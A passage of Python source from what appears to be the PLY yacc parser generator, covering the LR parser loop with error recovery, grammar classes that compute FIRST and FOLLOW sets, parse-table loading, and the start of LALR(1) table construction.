symstack.append(sym) state = goto[statestack[-1]][pname] statestack.append(state) except SyntaxError: # If an error was set. Enter error recovery state lookaheadstack.append(lookahead) symstack.pop() statestack.pop() state = statestack[-1] sym.type = 'error' lookahead = sym errorcount = error_count self.errorok = 0 continue # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! else: # --! TRACKING if tracking: sym.lineno = lexer.lineno sym.lexpos = lexer.lexpos # --! TRACKING targ = [ sym ] # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # The code enclosed in this section is duplicated # above as a performance optimization. Make sure # changes get made in both locations. pslice.slice = targ try: # Call the grammar rule with our special slice object p.callable(pslice) symstack.append(sym) state = goto[statestack[-1]][pname] statestack.append(state) except SyntaxError: # If an error was set. Enter error recovery state lookaheadstack.append(lookahead) symstack.pop() statestack.pop() state = statestack[-1] sym.type = 'error' lookahead = sym errorcount = error_count self.errorok = 0 continue # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! if t == 0: n = symstack[-1] return getattr(n,"value",None) if t == None: # We have some kind of parsing error here. To handle # this, we are going to push the current token onto # the tokenstack and replace it with an 'error' token. # If there are any synchronization rules, they may # catch it. # # In addition to pushing the error token, we call call # the user defined p_error() function if this is the # first syntax error. This function is only called if # errorcount == 0. if errorcount == 0 or self.errorok: errorcount = error_count self.errorok = 0 errtoken = lookahead if errtoken.type == '$end': errtoken = None # End of file! if self.errorfunc: global errok,token,restart errok = self.errok # Set some special functions available in error recovery token = get_token restart = self.restart if errtoken and not hasattr(errtoken,'lexer'): errtoken.lexer = lexer tok = self.errorfunc(errtoken) del errok, token, restart # Delete special functions if self.errorok: # User must have done some kind of panic # mode recovery on their own. The # returned token is the next lookahead lookahead = tok errtoken = None continue else: if errtoken: if hasattr(errtoken,"lineno"): lineno = lookahead.lineno else: lineno = 0 if lineno: sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type)) else: sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type) else: sys.stderr.write("yacc: Parse error in input. EOF\n") return else: errorcount = error_count # case 1: the statestack only has 1 entry on it. If we're in this state, the # entire parse has been rolled back and we're completely hosed. The token is # discarded and we just keep going. if len(statestack) <= 1 and lookahead.type != '$end': lookahead = None errtoken = None state = 0 # Nuke the pushback stack del lookaheadstack[:] continue # case 2: the statestack has a couple of entries on it, but we're # at the end of the file. nuke the top entry and generate an error token # Start nuking entries on the stack if lookahead.type == '$end': # Whoa. We're really hosed here. Bail out return if lookahead.type != 'error': sym = symstack[-1] if sym.type == 'error': # Hmmm. Error is on top of stack, we'll just nuke input # symbol and continue lookahead = None continue t = YaccSymbol() t.type = 'error' if hasattr(lookahead,"lineno"): t.lineno = lookahead.lineno t.value = lookahead lookaheadstack.append(lookahead) lookahead = t else: symstack.pop() statestack.pop() state = statestack[-1] # Potential bug fix continue # Call an error function here raise RuntimeError("yacc: internal parser error!!!\n") # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # parseopt_notrack(). # # Optimized version of parseopt() with line number tracking removed. # DO NOT EDIT THIS CODE DIRECTLY. Copy the optimized version and remove # code in the #--! TRACKING sections # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! def parseopt_notrack(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None): lookahead = None # Current lookahead symbol lookaheadstack = [ ] # Stack of lookahead symbols actions = self.action # Local reference to action table (to avoid lookup on self.) goto = self.goto # Local reference to goto table (to avoid lookup on self.) prod = self.productions # Local reference to production list (to avoid lookup on self.) pslice = YaccProduction(None) # Production object passed to grammar rules errorcount = 0 # Used during error recovery # If no lexer was given, we will try to use the lex module if not lexer: lex = load_ply_lex() lexer = lex.lexer # Set up the lexer and parser objects on pslice pslice.lexer = lexer pslice.parser = self # If input was supplied, pass to lexer if input is not None: lexer.input(input) if tokenfunc is None: # Tokenize function get_token = lexer.token else: get_token = tokenfunc # Set up the state and symbol stacks statestack = [ ] # Stack of parsing states self.statestack = statestack symstack = [ ] # Stack of grammar symbols self.symstack = symstack pslice.stack = symstack # Put in the production errtoken = None # Err token # The start state is assumed to be (0,$end) statestack.append(0) sym = YaccSymbol() sym.type = '$end' symstack.append(sym) state = 0 while 1: # Get the next symbol on the input. If a lookahead symbol # is already set, we just use that. Otherwise, we'll pull # the next token off of the lookaheadstack or from the lexer if not lookahead: if not lookaheadstack: lookahead = get_token() # Get the next token else: lookahead = lookaheadstack.pop() if not lookahead: lookahead = YaccSymbol() lookahead.type = '$end' # Check the action table ltype = lookahead.type t = actions[state].get(ltype) if t is not None: if t > 0: # shift a symbol on the stack statestack.append(t) state = t symstack.append(lookahead) lookahead = None # Decrease error count on successful shift if errorcount: errorcount -=1 continue if t < 0: # reduce a symbol on the stack, emit a production p = prod[-t] pname = p.name plen = p.len # Get production function sym = YaccSymbol() sym.type = pname # Production name sym.value = None if plen: targ = symstack[-plen-1:] targ[0] = sym # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # The code enclosed in this section is duplicated # below as a performance optimization. Make sure # changes get made in both locations. pslice.slice = targ try: # Call the grammar rule with our special slice object del symstack[-plen:] del statestack[-plen:] p.callable(pslice) symstack.append(sym) state = goto[statestack[-1]][pname] statestack.append(state) except SyntaxError: # If an error was set. Enter error recovery state lookaheadstack.append(lookahead) symstack.pop() statestack.pop() state = statestack[-1] sym.type = 'error' lookahead = sym errorcount = error_count self.errorok = 0 continue # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! else: targ = [ sym ] # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # The code enclosed in this section is duplicated # above as a performance optimization. Make sure # changes get made in both locations. pslice.slice = targ try: # Call the grammar rule with our special slice object p.callable(pslice) symstack.append(sym) state = goto[statestack[-1]][pname] statestack.append(state) except SyntaxError: # If an error was set. Enter error recovery state lookaheadstack.append(lookahead) symstack.pop() statestack.pop() state = statestack[-1] sym.type = 'error' lookahead = sym errorcount = error_count self.errorok = 0 continue # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! if t == 0: n = symstack[-1] return getattr(n,"value",None) if t == None: # We have some kind of parsing error here. To handle # this, we are going to push the current token onto # the tokenstack and replace it with an 'error' token. # If there are any synchronization rules, they may # catch it. # # In addition to pushing the error token, we call call # the user defined p_error() function if this is the # first syntax error. This function is only called if # errorcount == 0. if errorcount == 0 or self.errorok: errorcount = error_count self.errorok = 0 errtoken = lookahead if errtoken.type == '$end': errtoken = None # End of file! if self.errorfunc: global errok,token,restart errok = self.errok # Set some special functions available in error recovery token = get_token restart = self.restart if errtoken and not hasattr(errtoken,'lexer'): errtoken.lexer = lexer tok = self.errorfunc(errtoken) del errok, token, restart # Delete special functions if self.errorok: # User must have done some kind of panic # mode recovery on their own. The # returned token is the next lookahead lookahead = tok errtoken = None continue else: if errtoken: if hasattr(errtoken,"lineno"): lineno = lookahead.lineno else: lineno = 0 if lineno: sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type)) else: sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type) else: sys.stderr.write("yacc: Parse error in input. EOF\n") return else: errorcount = error_count # case 1: the statestack only has 1 entry on it. If we're in this state, the # entire parse has been rolled back and we're completely hosed. The token is # discarded and we just keep going. if len(statestack) <= 1 and lookahead.type != '$end': lookahead = None errtoken = None state = 0 # Nuke the pushback stack del lookaheadstack[:] continue # case 2: the statestack has a couple of entries on it, but we're # at the end of the file. nuke the top entry and generate an error token # Start nuking entries on the stack if lookahead.type == '$end': # Whoa. We're really hosed here. Bail out return if lookahead.type != 'error': sym = symstack[-1] if sym.type == 'error': # Hmmm. Error is on top of stack, we'll just nuke input # symbol and continue lookahead = None continue t = YaccSymbol() t.type = 'error' if hasattr(lookahead,"lineno"): t.lineno = lookahead.lineno t.value = lookahead lookaheadstack.append(lookahead) lookahead = t else: symstack.pop() statestack.pop() state = statestack[-1] # Potential bug fix continue # Call an error function here raise RuntimeError("yacc: internal parser error!!!\n") # ----------------------------------------------------------------------------- # === Grammar Representation === # # The following functions, classes, and variables are used to represent and # manipulate the rules that make up a grammar. # ----------------------------------------------------------------------------- import re # regex matching identifiers _is_identifier = re.compile(r'^[a-zA-Z0-9_-]+$') # ----------------------------------------------------------------------------- # class Production: # # This class stores the raw information about a single production or grammar rule. # A grammar rule refers to a specification such as this: # # expr : expr PLUS term # # Here are the basic attributes defined on all productions # # name - Name of the production. For example 'expr' # prod - A list of symbols on the right side ['expr','PLUS','term'] # prec - Production precedence level # number - Production number. # func - Function that executes on reduce # file - File where production function is defined # lineno - Line number where production function is defined # # The following attributes are defined or optional. # # len - Length of the production (number of symbols on right hand side) # usyms - Set of unique symbols found in the production # ----------------------------------------------------------------------------- class Production(object): reduced = 0 def __init__(self,number,name,prod,precedence=('right',0),func=None,file='',line=0): self.name = name self.prod = tuple(prod) self.number = number self.func = func self.callable = None self.file = file self.line = line self.prec = precedence # Internal settings used during table construction self.len = len(self.prod) # Length of the production # Create a list of unique production symbols used in the production self.usyms = [ ] for s in self.prod: if s not in self.usyms: self.usyms.append(s) # List of all LR items for the production self.lr_items = [] self.lr_next = None # Create a string representation if self.prod: self.str = "%s -> %s" % (self.name," ".join(self.prod)) else: self.str = "%s -> <empty>" % self.name def __str__(self): return self.str def __repr__(self): return "Production("+str(self)+")" def __len__(self): return len(self.prod) def __nonzero__(self): return 1 def __getitem__(self,index): return self.prod[index] # Return the nth lr_item from the production (or None if at the end) def lr_item(self,n): if n > len(self.prod): return None p = LRItem(self,n) # Precompute the list of productions immediately following. Hack. Remove later try: p.lr_after = Prodnames[p.prod[n+1]] except (IndexError,KeyError): p.lr_after = [] try: p.lr_before = p.prod[n-1] except IndexError: p.lr_before = None return p # Bind the production function name to a callable def bind(self,pdict): if self.func: self.callable = pdict[self.func] # This class serves as a minimal standin for Production objects when # reading table data from files. It only contains information # actually used by the LR parsing engine, plus some additional # debugging information. class MiniProduction(object): def __init__(self,str,name,len,func,file,line): self.name = name self.len = len self.func = func self.callable = None self.file = file self.line = line self.str = str def __str__(self): return self.str def __repr__(self): return "MiniProduction(%s)" % self.str # Bind the production function name to a callable def bind(self,pdict): if self.func: self.callable = pdict[self.func] # ----------------------------------------------------------------------------- # class LRItem # # This class represents a specific stage of parsing a production rule. For # example: # # expr : expr . PLUS term # # In the above, the "." represents the current location of the parse. Here # basic attributes: # # name - Name of the production. For example 'expr' # prod - A list of symbols on the right side ['expr','.', 'PLUS','term'] # number - Production number. # # lr_next Next LR item. Example, if we are ' expr -> expr . PLUS term' # then lr_next refers to 'expr -> expr PLUS . term' # lr_index - LR item index (location of the ".") in the prod list. # lookaheads - LALR lookahead symbols for this item # len - Length of the production (number of symbols on right hand side) # lr_after - List of all productions that immediately follow # lr_before - Grammar symbol immediately before # ----------------------------------------------------------------------------- class LRItem(object): def __init__(self,p,n): self.name = p.name self.prod = list(p.prod) self.number = p.number self.lr_index = n self.lookaheads = { } self.prod.insert(n,".") self.prod = tuple(self.prod) self.len = len(self.prod) self.usyms = p.usyms def __str__(self): if self.prod: s = "%s -> %s" % (self.name," ".join(self.prod)) else: s = "%s -> <empty>" % self.name return s def __repr__(self): return "LRItem("+str(self)+")" # ----------------------------------------------------------------------------- # rightmost_terminal() # # Return the rightmost terminal from a list of symbols. Used in add_production() # ----------------------------------------------------------------------------- def rightmost_terminal(symbols, terminals): i = len(symbols) - 1 while i >= 0: if symbols[i] in terminals: return symbols[i] i -= 1 return None # ----------------------------------------------------------------------------- # === GRAMMAR CLASS === # # The following class represents the contents of the specified grammar along # with various computed properties such as first sets, follow sets, LR items, etc. # This data is used for critical parts of the table generation process later. # ----------------------------------------------------------------------------- class GrammarError(YaccError): pass class Grammar(object): def __init__(self,terminals): self.Productions = [None] # A list of all of the productions. The first # entry is always reserved for the purpose of # building an augmented grammar self.Prodnames = { } # A dictionary mapping the names of nonterminals to a list of all # productions of that nonterminal. self.Prodmap = { } # A dictionary that is only used to detect duplicate # productions. self.Terminals = { } # A dictionary mapping the names of terminal symbols to a # list of the rules where they are used. for term in terminals: self.Terminals[term] = [] self.Terminals['error'] = [] self.Nonterminals = { } # A dictionary mapping names of nonterminals to a list # of rule numbers where they are used. self.First = { } # A dictionary of precomputed FIRST(x) symbols self.Follow = { } # A dictionary of precomputed FOLLOW(x) symbols self.Precedence = { } # Precedence rules for each terminal. Contains tuples of the # form ('right',level) or ('nonassoc', level) or ('left',level) self.UsedPrecedence = { } # Precedence rules that were actually used by the grammer. # This is only used to provide error checking and to generate # a warning about unused precedence rules. self.Start = None # Starting symbol for the grammar def __len__(self): return len(self.Productions) def __getitem__(self,index): return self.Productions[index] # ----------------------------------------------------------------------------- # set_precedence() # # Sets the precedence for a given terminal. assoc is the associativity such as # 'left','right', or 'nonassoc'. level is a numeric level. # # ----------------------------------------------------------------------------- def set_precedence(self,term,assoc,level): assert self.Productions == [None],"Must call set_precedence() before add_production()" if term in self.Precedence: raise GrammarError("Precedence already specified for terminal '%s'" % term) if assoc not in ['left','right','nonassoc']: raise GrammarError("Associativity must be one of 'left','right', or 'nonassoc'") self.Precedence[term] = (assoc,level) # ----------------------------------------------------------------------------- # add_production() # # Given an action function, this function assembles a production rule and # computes its precedence level. # # The production rule is supplied as a list of symbols. For example, # a rule such as 'expr : expr PLUS term' has a production name of 'expr' and # symbols ['expr','PLUS','term']. # # Precedence is determined by the precedence of the right-most non-terminal # or the precedence of a terminal specified by %prec. # # A variety of error checks are performed to make sure production symbols # are valid and that %prec is used correctly. # ----------------------------------------------------------------------------- def add_production(self,prodname,syms,func=None,file='',line=0): if prodname in self.Terminals: raise GrammarError("%s:%d: Illegal rule name '%s'. Already defined as a token" % (file,line,prodname)) if prodname == 'error': raise GrammarError("%s:%d: Illegal rule name '%s'. error is a reserved word" % (file,line,prodname)) if not _is_identifier.match(prodname): raise GrammarError("%s:%d: Illegal rule name '%s'" % (file,line,prodname)) # Look for literal tokens for n,s in enumerate(syms): if s[0] in "'\"": try: c = eval(s) if (len(c) > 1): raise GrammarError("%s:%d: Literal token %s in rule '%s' may only be a single character" % (file,line,s, prodname)) if not c in self.Terminals: self.Terminals[c] = [] syms[n] = c continue except SyntaxError: pass if not _is_identifier.match(s) and s != '%prec': raise GrammarError("%s:%d: Illegal name '%s' in rule '%s'" % (file,line,s, prodname)) # Determine the precedence level if '%prec' in syms: if syms[-1] == '%prec': raise GrammarError("%s:%d: Syntax error. Nothing follows %%prec" % (file,line)) if syms[-2] != '%prec': raise GrammarError("%s:%d: Syntax error. %%prec can only appear at the end of a grammar rule" % (file,line)) precname = syms[-1] prodprec = self.Precedence.get(precname,None) if not prodprec: raise GrammarError("%s:%d: Nothing known about the precedence of '%s'" % (file,line,precname)) else: self.UsedPrecedence[precname] = 1 del syms[-2:] # Drop %prec from the rule else: # If no %prec, precedence is determined by the rightmost terminal symbol precname = rightmost_terminal(syms,self.Terminals) prodprec = self.Precedence.get(precname,('right',0)) # See if the rule is already in the rulemap map = "%s -> %s" % (prodname,syms) if map in self.Prodmap: m = self.Prodmap[map] raise GrammarError("%s:%d: Duplicate rule %s. " % (file,line, m) + "Previous definition at %s:%d" % (m.file, m.line)) # From this point on, everything is valid. Create a new Production instance pnumber = len(self.Productions) if not prodname in self.Nonterminals: self.Nonterminals[prodname] = [ ] # Add the production number to Terminals and Nonterminals for t in syms: if t in self.Terminals: self.Terminals[t].append(pnumber) else: if not t in self.Nonterminals: self.Nonterminals[t] = [ ] self.Nonterminals[t].append(pnumber) # Create a production and add it to the list of productions p = Production(pnumber,prodname,syms,prodprec,func,file,line) self.Productions.append(p) self.Prodmap[map] = p # Add to the global productions list try: self.Prodnames[prodname].append(p) except KeyError: self.Prodnames[prodname] = [ p ] return 0 # ----------------------------------------------------------------------------- # set_start() # # Sets the starting symbol and creates the augmented grammar. Production # rule 0 is S' -> start where start is the start symbol. # ----------------------------------------------------------------------------- def set_start(self,start=None): if not start: start = self.Productions[1].name if start not in self.Nonterminals: raise GrammarError("start symbol %s undefined" % start) self.Productions[0] = Production(0,"S'",[start]) self.Nonterminals[start].append(0) self.Start = start # ----------------------------------------------------------------------------- # find_unreachable() # # Find all of the nonterminal symbols that can't be reached from the starting # symbol. Returns a list of nonterminals that can't be reached. # ----------------------------------------------------------------------------- def find_unreachable(self): # Mark all symbols that are reachable from a symbol s def mark_reachable_from(s): if reachable[s]: # We've already reached symbol s. return reachable[s] = 1 for p in self.Prodnames.get(s,[]): for r in p.prod: mark_reachable_from(r) reachable = { } for s in list(self.Terminals) + list(self.Nonterminals): reachable[s] = 0 mark_reachable_from( self.Productions[0].prod[0] ) return [s for s in list(self.Nonterminals) if not reachable[s]] # ----------------------------------------------------------------------------- # infinite_cycles() # # This function looks at the various parsing rules and tries to detect # infinite recursion cycles (grammar rules where there is no possible way # to derive a string of only terminals). # ----------------------------------------------------------------------------- def infinite_cycles(self): terminates = {} # Terminals: for t in self.Terminals: terminates[t] = 1 terminates['$end'] = 1 # Nonterminals: # Initialize to false: for n in self.Nonterminals: terminates[n] = 0 # Then propagate termination until no change: while 1: some_change = 0 for (n,pl) in self.Prodnames.items(): # Nonterminal n terminates iff any of its productions terminates. for p in pl: # Production p terminates iff all of its rhs symbols terminate. for s in p.prod: if not terminates[s]: # The symbol s does not terminate, # so production p does not terminate. p_terminates = 0 break else: # didn't break from the loop, # so every symbol s terminates # so production p terminates. p_terminates = 1 if p_terminates: # symbol n terminates! if not terminates[n]: terminates[n] = 1 some_change = 1 # Don't need to consider any more productions for this n. break if not some_change: break infinite = [] for (s,term) in terminates.items(): if not term: if not s in self.Prodnames and not s in self.Terminals and s != 'error': # s is used-but-not-defined, and we've already warned of that, # so it would be overkill to say that it's also non-terminating. pass else: infinite.append(s) return infinite # ----------------------------------------------------------------------------- # undefined_symbols() # # Find all symbols that were used the grammar, but not defined as tokens or # grammar rules. Returns a list of tuples (sym, prod) where sym in the symbol # and prod is the production where the symbol was used. # ----------------------------------------------------------------------------- def undefined_symbols(self): result = [] for p in self.Productions: if not p: continue for s in p.prod: if not s in self.Prodnames and not s in self.Terminals and s != 'error': result.append((s,p)) return result # ----------------------------------------------------------------------------- # unused_terminals() # # Find all terminals that were defined, but not used by the grammar. Returns # a list of all symbols. # ----------------------------------------------------------------------------- def unused_terminals(self): unused_tok = [] for s,v in self.Terminals.items(): if s != 'error' and not v: unused_tok.append(s) return unused_tok # ------------------------------------------------------------------------------ # unused_rules() # # Find all grammar rules that were defined, but not used (maybe not reachable) # Returns a list of productions. # ------------------------------------------------------------------------------ def unused_rules(self): unused_prod = [] for s,v in self.Nonterminals.items(): if not v: p = self.Prodnames[s][0] unused_prod.append(p) return unused_prod # ----------------------------------------------------------------------------- # unused_precedence() # # Returns a list of tuples (term,precedence) corresponding to precedence # rules that were never used by the grammar. term is the name of the terminal # on which precedence was applied and precedence is a string such as 'left' or # 'right' corresponding to the type of precedence. # ----------------------------------------------------------------------------- def unused_precedence(self): unused = [] for termname in self.Precedence: if not (termname in self.Terminals or termname in self.UsedPrecedence): unused.append((termname,self.Precedence[termname][0])) return unused # ------------------------------------------------------------------------- # _first() # # Compute the value of FIRST1(beta) where beta is a tuple of symbols. # # During execution of compute_first1, the result may be incomplete. # Afterward (e.g., when called from compute_follow()), it will be complete. # ------------------------------------------------------------------------- def _first(self,beta): # We are computing First(x1,x2,x3,...,xn) result = [ ] for x in beta: x_produces_empty = 0 # Add all the non-<empty> symbols of First[x] to the result. for f in self.First[x]: if f == '<empty>': x_produces_empty = 1 else: if f not in result: result.append(f) if x_produces_empty: # We have to consider the next x in beta, # i.e. stay in the loop. pass else: # We don't have to consider any further symbols in beta. break else: # There was no 'break' from the loop, # so x_produces_empty was true for all x in beta, # so beta produces empty as well. result.append('<empty>') return result # ------------------------------------------------------------------------- # compute_first() # # Compute the value of FIRST1(X) for all symbols # ------------------------------------------------------------------------- def compute_first(self): if self.First: return self.First # Terminals: for t in self.Terminals: self.First[t] = [t] self.First['$end'] = ['$end'] # Nonterminals: # Initialize to the empty set: for n in self.Nonterminals: self.First[n] = [] # Then propagate symbols until no change: while 1: some_change = 0 for n in self.Nonterminals: for p in self.Prodnames[n]: for f in self._first(p.prod): if f not in self.First[n]: self.First[n].append( f ) some_change = 1 if not some_change: break return self.First # --------------------------------------------------------------------- # compute_follow() # # Computes all of the follow sets for every non-terminal symbol. The # follow set is the set of all symbols that might follow a given # non-terminal. See the Dragon book, 2nd Ed. p. 189. # --------------------------------------------------------------------- def compute_follow(self,start=None): # If already computed, return the result if self.Follow: return self.Follow # If first sets not computed yet, do that first. if not self.First: self.compute_first() # Add '$end' to the follow list of the start symbol for k in self.Nonterminals: self.Follow[k] = [ ] if not start: start = self.Productions[1].name self.Follow[start] = [ '$end' ] while 1: didadd = 0 for p in self.Productions[1:]: # Here is the production set for i in range(len(p.prod)): B = p.prod[i] if B in self.Nonterminals: # Okay. We got a non-terminal in a production fst = self._first(p.prod[i+1:]) hasempty = 0 for f in fst: if f != '<empty>' and f not in self.Follow[B]: self.Follow[B].append(f) didadd = 1 if f == '<empty>': hasempty = 1 if hasempty or i == (len(p.prod)-1): # Add elements of follow(a) to follow(b) for f in self.Follow[p.name]: if f not in self.Follow[B]: self.Follow[B].append(f) didadd = 1 if not didadd: break return self.Follow # ----------------------------------------------------------------------------- # build_lritems() # # This function walks the list of productions and builds a complete set of the # LR items. The LR items are stored in two ways: First, they are uniquely # numbered and placed in the list _lritems. Second, a linked list of LR items # is built for each production. For example: # # E -> E PLUS E # # Creates the list # # [E -> . E PLUS E, E -> E . PLUS E, E -> E PLUS . E, E -> E PLUS E . ] # ----------------------------------------------------------------------------- def build_lritems(self): for p in self.Productions: lastlri = p i = 0 lr_items = [] while 1: if i > len(p): lri = None else: lri = LRItem(p,i) # Precompute the list of productions immediately following try: lri.lr_after = self.Prodnames[lri.prod[i+1]] except (IndexError,KeyError): lri.lr_after = [] try: lri.lr_before = lri.prod[i-1] except IndexError: lri.lr_before = None lastlri.lr_next = lri if not lri: break lr_items.append(lri) lastlri = lri i += 1 p.lr_items = lr_items # ----------------------------------------------------------------------------- # == Class LRTable == # # This basic class represents a basic table of LR parsing information. # Methods for generating the tables are not defined here. They are defined # in the derived class LRGeneratedTable. # ----------------------------------------------------------------------------- class VersionError(YaccError): pass class LRTable(object): def __init__(self): self.lr_action = None self.lr_goto = None self.lr_productions = None self.lr_method = None def read_table(self,module): if isinstance(module,types.ModuleType): parsetab = module else: if sys.version_info[0] < 3: exec("import %s as parsetab" % module) else: env = { } exec("import %s as parsetab" % module, env, env) parsetab = env['parsetab'] if parsetab._tabversion != __tabversion__: raise VersionError("yacc table file version is out of date") self.lr_action = parsetab._lr_action self.lr_goto = parsetab._lr_goto self.lr_productions = [] for p in parsetab._lr_productions: self.lr_productions.append(MiniProduction(*p)) self.lr_method = parsetab._lr_method return parsetab._lr_signature def read_pickle(self,filename): try: import cPickle as pickle except ImportError: import pickle in_f = open(filename,"rb") tabversion = pickle.load(in_f) if tabversion != __tabversion__: raise VersionError("yacc table file version is out of date") self.lr_method = pickle.load(in_f) signature = pickle.load(in_f) self.lr_action = pickle.load(in_f) self.lr_goto = pickle.load(in_f) productions = pickle.load(in_f) self.lr_productions = [] for p in productions: self.lr_productions.append(MiniProduction(*p)) in_f.close() return signature # Bind all production function names to callable objects in pdict def bind_callables(self,pdict): for p in self.lr_productions: p.bind(pdict) # ----------------------------------------------------------------------------- # === LR Generator === # # The following classes and functions are used to generate LR parsing tables on # a grammar. # ----------------------------------------------------------------------------- # ----------------------------------------------------------------------------- # digraph() # traverse() # # The following two functions are used to compute set valued functions # of the form: # # F(x) = F'(x) U U{F(y) | x R y} # # This is used to compute the values of Read() sets as well as FOLLOW sets # in LALR(1) generation. # # Inputs: X - An input set # R - A relation # FP - Set-valued function # ------------------------------------------------------------------------------ def digraph(X,R,FP): N = { } for x in X: N[x] = 0 stack = [] F = { } for x in X: if N[x] == 0: traverse(x,N,stack,F,X,R,FP) return F def traverse(x,N,stack,F,X,R,FP): stack.append(x) d = len(stack) N[x] = d F[x] = FP(x) # F(X) <- F'(x) rel = R(x) # Get y's related to x for y in rel: if N[y] == 0: traverse(y,N,stack,F,X,R,FP) N[x] = min(N[x],N[y]) for a in F.get(y,[]): if a not in F[x]: F[x].append(a) if N[x] == d: N[stack[-1]] = MAXINT F[stack[-1]] = F[x] element = stack.pop() while element != x: N[stack[-1]] = MAXINT F[stack[-1]] = F[x] element = stack.pop() class LALRError(YaccError): pass # ----------------------------------------------------------------------------- # == LRGeneratedTable == # # This class implements the LR table generation algorithm. There are no # public methods except for write() # ----------------------------------------------------------------------------- class LRGeneratedTable(LRTable): def __init__(self,grammar,method='LALR',log=None): if method not in ['SLR','LALR']: raise LALRError("Unsupported method %s" % method) self.grammar = grammar self.lr_method = method # Set up the logger if not log: log = NullLogger() self.log = log # Internal attributes self.lr_action = {} # Action table self.lr_goto = {} # Goto table self.lr_productions = grammar.Productions # Copy of grammar Production array self.lr_goto_cache = {} # Cache of computed gotos self.lr0_cidhash = {} # Cache of closures self._add_count = 0 # Internal counter used to detect cycles # Diagonistic information filled in by the table generator self.sr_conflict = 0 self.rr_conflict = 0 self.conflicts = [] # List of conflicts self.sr_conflicts = [] self.rr_conflicts = [] # Build the tables self.grammar.build_lritems() self.grammar.compute_first() self.grammar.compute_follow() self.lr_parse_table() # Compute the LR(0) closure operation on I, where I is a set of LR(0) items. def lr0_closure(self,I): self._add_count += 1 # Add everything in I to J J = I[:] didadd = 1 while didadd: didadd = 0 for j in J: for x in j.lr_after: if getattr(x,"lr0_added",0) == self._add_count: continue # Add B --> .G to J J.append(x.lr_next) x.lr0_added = self._add_count didadd = 1 return J # Compute the LR(0) goto function goto(I,X) where I is a set # of LR(0) items and X is a grammar symbol. This function is written # in a way that guarantees uniqueness of the generated goto sets # (i.e. the same goto set will never be returned as two different Python # objects). With uniqueness, we can later do fast set comparisons using # id(obj) instead of element-wise comparison. def lr0_goto(self,I,x): # First we look for a previously cached entry g = self.lr_goto_cache.get((id(I),x),None) if g: return g # Now we generate the goto set in a way that guarantees uniqueness # of the result s = self.lr_goto_cache.get(x,None) if not s: s = { } self.lr_goto_cache[x] = s gs = [ ] for p in I: n = p.lr_next if n and n.lr_before == x: s1 = s.get(id(n),None) if not s1: s1 = { } s[id(n)] = s1 gs.append(n) s = s1 g = s.get('$end',None) if not g: if gs: g = self.lr0_closure(gs) s['$end'] = g else: s['$end'] = gs self.lr_goto_cache[(id(I),x)] = g return g # Compute the LR(0) sets of item function def lr0_items(self): C = [ self.lr0_closure([self.grammar.Productions[0].lr_next]) ] i = 0 for I in C: self.lr0_cidhash[id(I)] = i i += 1 # Loop over the items in C and each grammar symbols i = 0 while i < len(C): I = C[i] i += 1 # Collect all of the symbols that could possibly be in the goto(I,X) sets asyms = { } for ii in I: for s in ii.usyms: asyms[s] = None for x in asyms: g = self.lr0_goto(I,x) if not g: continue if id(g) in self.lr0_cidhash: continue self.lr0_cidhash[id(g)] = len(C) C.append(g) return C # ----------------------------------------------------------------------------- # ==== LALR(1) Parsing ==== # # LALR(1) parsing is almost exactly the same as SLR except that instead of # relying upon Follow() sets when performing reductions, a more selective # lookahead set that incorporates the state of the LR(0) machine is utilized. # Thus, we mainly just have to focus on calculating the lookahead sets. # # The method used here is due to DeRemer and Pennelo (1982). # # DeRemer, F. L., and T. J. Pennelo: "Efficient Computation of LALR(1) # Lookahead Sets", ACM Transactions on Programming Languages and Systems, # Vol. 4, No. 4, Oct. 1982, pp. 615-649 # # Further details can also be found in: # # J. Tremblay and P. Sorenson, "The Theory and Practice of Compiler Writing", # McGraw-Hill Book Company, (1985). # # ----------------------------------------------------------------------------- # ----------------------------------------------------------------------------- # compute_nullable_nonterminals() # # Creates a dictionary containing all of the non-terminals that might produce # an empty production. # ----------------------------------------------------------------------------- def compute_nullable_nonterminals(self): nullable = {} num_nullable = 0 while 1: for p in self.grammar.Productions[1:]: if p.len == 0: nullable[p.name] = 1 continue for t in p.prod: if not t in nullable: break else: nullable[p.name] = 1 if len(nullable) == num_nullable: break num_nullable = len(nullable) return nullable # ----------------------------------------------------------------------------- # find_nonterminal_trans(C) # # Given a set of LR(0) items, this functions finds all of the non-terminal # transitions. These are transitions in which a dot appears immediately before # a non-terminal. Returns a list of tuples of the form (state,N) where state # is the state number and N is the nonterminal symbol. # # The input C is the set of LR(0) items. # ----------------------------------------------------------------------------- def find_nonterminal_transitions(self,C): trans = [] for state in range(len(C)): for p in C[state]: if p.lr_index < p.len - 1: t = (state,p.prod[p.lr_index+1]) if t[1] in self.grammar.Nonterminals: if t not in trans: trans.append(t) state = state + 1 return trans # ----------------------------------------------------------------------------- # dr_relation() # # Computes the DR(p,A) relationships for non-terminal transitions. The input # is a tuple (state,N) where state is a number and N is a nonterminal symbol. # # Returns a list of terminals. # ----------------------------------------------------------------------------- def dr_relation(self,C,trans,nullable): dr_set = { } state,N = trans terms = [] g = self.lr0_goto(C[state],N) for p in g: if p.lr_index < p.len - 1: a = p.prod[p.lr_index+1] if a in self.grammar.Terminals: if a not in terms: terms.append(a) # This extra bit is to handle the start state if state == 0 and N == self.grammar.Productions[0].prod[0]: terms.append('$end') return terms # ----------------------------------------------------------------------------- # reads_relation() # # Computes the READS() relation (p,A) READS (t,C). 